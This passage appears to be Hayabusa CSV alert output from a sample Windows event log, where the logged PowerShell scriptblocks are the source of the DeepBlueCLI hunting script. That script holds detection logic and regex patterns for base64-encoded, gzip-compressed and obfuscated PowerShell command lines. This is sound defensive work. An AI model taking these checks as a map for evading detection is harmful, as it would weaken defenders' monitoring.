1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n""",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.127 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.127 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.127 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.127 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. 
# I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.130 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.136 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.139 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
